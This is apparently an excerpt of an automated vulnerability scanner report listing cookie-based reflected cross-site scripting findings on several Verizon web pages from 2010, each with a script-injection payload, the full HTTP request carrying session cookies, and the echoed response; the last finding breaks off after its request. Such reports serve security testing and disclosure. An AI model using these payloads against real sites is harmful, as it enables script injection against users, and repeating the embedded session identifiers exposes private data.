<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "99a3b"-alert(1)-"75f87706d4"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
var m_view = new VZT.MasterNavView();
var m_model = {container: document.getElementB
...[SNIP]...

1.185. https://www22.verizon.com/Residential/TV/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8583'><script>alert(1)</script>df9eda5005b was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXf8583'><script>alert(1)</script>df9eda5005b; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76231
Expires: Sat, 20 Nov 2010 02:57:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf8583'><script>alert(1)</script>df9eda5005b; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF8583'><SCRIPT>ALERT(1)</SCRIPT>DF9EDA5005B ' />
...[SNIP]...

1.186. https://www22.verizon.com/Residential/TV/ [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/TV/

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 4c88c<script>alert(1)</script>04868af3b9a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/TV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX4c88c<script>alert(1)</script>04868af3b9a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76227
Expires: Sat, 20 Nov 2010 02:57:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:57:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4c88c<script>alert(1)</script>04868af3b9a; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/

<html xmlns:vz>
<head id="_ctl0_head"><title>
Verizon | FIOS TV + HD TV Service
</title><meta name="keywords" content="video on demand, vod, premium cable tv, cable service, cable internet, dsl
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX4C88C<SCRIPT>ALERT(1)</SCRIPT>04868AF3B9A </DIV>
...[SNIP]...

1.187. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 120ad<script>alert(1)</script>163fbe4701a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX120ad<script>alert(1)</script>163fbe4701a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70905
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX120ad<script>alert(1)</script>163fbe4701a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX120AD<SCRIPT>ALERT(1)</SCRIPT>163FBE4701A </DIV>
...[SNIP]...

1.188. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [VzApps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 79db9'><script>alert(1)</script>84341307296 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX79db9'><script>alert(1)</script>84341307296; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 02:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX79db9'><script>alert(1)</script>84341307296; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX79DB9'><SCRIPT>ALERT(1)</SCRIPT>84341307296 ' />
...[SNIP]...

1.189. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/Residential/aboutFiOS/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6862"-alert(1)-"9695dc43a78 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
